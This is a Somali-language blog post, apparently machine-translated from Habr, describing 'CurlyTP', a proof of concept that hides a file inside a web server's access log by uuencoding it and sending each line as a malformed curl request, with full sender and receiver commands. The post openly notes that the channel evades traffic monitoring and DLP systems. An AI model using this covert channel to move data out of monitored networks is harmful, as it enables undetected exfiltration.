ProHoster > Π‘Π»ΠΎΠ³ > Maamulka > Ku beddelashada fariimaha sirta ah iyada oo loo marayo diiwaannada server-ka

Ku beddelashada fariimaha sirta ah iyada oo loo marayo diiwaannada server-ka

Marka loo eego qeexitaanka Wikipedia, dhibic dhintay waa aalad shirqool oo u adeegta in la is dhaafsado macluumaadka ama waxyaabaha qaar ee u dhexeeya dadka isticmaalaya meel qarsoodi ah. Fikradda ayaa ah in dadku waligood kulmaan - laakiin wali waxay isweydaarsadaan macluumaadka si ay u ilaaliyaan badbaadada hawlgalka.

Meesha lagu qarinayo waa inaysan soo jiidan dareenka. Sidaa darteed, adduunka khadka tooska ah waxay inta badan isticmaalaan waxyaabo qarsoodi ah: leben dabacsan oo gidaarka ah, buug maktabad, ama geed godan.

Waxaa jira qalab badan oo qarsoodi ah iyo qarsoodi ah oo ku jira internetka, laakiin xaqiiqda isticmaalka qalabkan ayaa soo jiidanaya dareenka. Intaa waxaa dheer, waxaa laga yaabaa in lagu xannibo heer shirkad ama dowlad. Maxaa la sameeyaa?

Horumarinta Ryan Flowers ayaa soo jeediyay ikhtiyaar xiiso leh - u isticmaal shabakad kasta oo shabakadeed meel lagu dhuunto. Haddii aad ka fikirto, muxuu sameeyaa server-ka shabakadu? Helaa codsiyada, soo saara faylalka oo qoraa diiwaannada. Oo waxay diiwaan gelisaa dhammaan codsiyada, xataa kuwa khaldan!

Waxay soo baxday in server kasta oo shabakadu kuu ogolaado inaad kaydiso ku dhawaad ​​fariin kasta oo ku jirta log. Ubax ayaa la yaabay sida tan loo isticmaalo.

Wuxuu bixiyaa doorashadan:

  1. Qaado faylka qoraalka (fariinta sirta ah) oo xisaabi xashiishka (md5sum).
  2. Waxaan ku dhejineynaa (gzip+uuencode).
  3. Waxaan u qornaa log-ka annagoo adeegsanayna codsi khaldan oo si ula kac ah u diray serverka.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Si aad u akhrido fayl, waxaad u baahan tahay inaad u samayso hawlgalladan siday u kala horreeyaan: fur oo fur faylka, hubi xashiishka (xashku si badbaado leh ayaa loogu gudbin karaa kanaalada furan).

boosaska waxaa lagu badalaa =+=si aanay meelo banaan ah ugu jirin ciwaanka. Barnaamijka, oo uu qoraagu ugu yeedhay CurlyTP, wuxuu isticmaalaa base64 codeing, sida lifaaqyada iimaylka. Codsiga waxaa lagu sameeyay kelmad muhiim ah ?transfer?si qofka qaataha ahi uu si fudud ugu dhex helo diiwaanka.

Maxaan ku aragnaa diiwaanka kiiskan?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Sidaan horeyba u soo sheegnay, si aad u hesho fariin sir ah waxaad u baahan tahay inaad u qabato hawlgalada sida ay u kala horeeyaan:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Nidaamku waa sahlan yahay in si otomaatig ah loo sameeyo. Md5sum waa u dhigma, iyo waxa ku jira faylka ayaa xaqiijinaya in wax walba si sax ah loo dajiyay.

Habka waa mid aad u fudud. "Ujeeddada layligani waa in la caddeeyo in faylasha lagu wareejin karo codsiyo shabakad yar oo aan waxba galabsan, waxayna ka shaqeysaa server kasta oo leh qoraallo cad. Asal ahaan, shabakad kasta oo shabakadeed waa meel lagu dhuunto!” ayuu qoray Ubax.

Dabcan, habku wuxuu shaqeeyaa kaliya haddii qaataha uu marin u leeyahay diiwaannada server-ka. Laakiin gelitaankan oo kale waxa bixiya, tusaale ahaan, martigeliyayaal badan.

Sidee loo isticmaalaa?

Ryan Flowers waxa uu sheegay in aanu ahayn khabiir amniga macluumaadka oo aanu ururin doonin liiska suurtogalka ah ee loo isticmaalo CurlyTP. Isaga, waa caddaynta fikradda ah in qalabka la yaqaan ee aan aragno maalin kasta loo isticmaali karo hab aan caadi ahayn.

Dhab ahaantii, habkani waxa uu leeyahay tiro ka mid ah faa'iidooyinka ka badan server kale "qarin" sida Dhimashada Dijital ah ama PirateBox: uma baahna qaabayn gaar ah dhinaca server-ka ama hab-maamuusyo gaar ah - mana kicin doonto shaki kuwa la socda taraafikada. Uma badna in nidaamka SORM ama DLP uu ka baadho URL-yada faylalka qoraalka ah ee la cufan.

Tani waa mid ka mid ah siyaabaha fariimaha loogu gudbiyo faylasha adeegga. Waxaad xasuusan kartaa sida ay shirkado horumarsan qaarkood u dhigi jireen Shaqooyinka Horumariyaha ee HTTP Headers ama ku jira koodka bogagga HTML.

Ku beddelashada fariimaha sirta ah iyada oo loo marayo diiwaannada server-ka

Fikradda ayaa ahayd in kaliya horumarinta shabakadaha ay arki doonaan ukunta Easter-ka, maadaama qofka caadiga ah uusan eegin madaxyada ama code HTML.

Ku beddelashada fariimaha sirta ah iyada oo loo marayo diiwaannada server-ka

Source: www.habr.com

Add a comment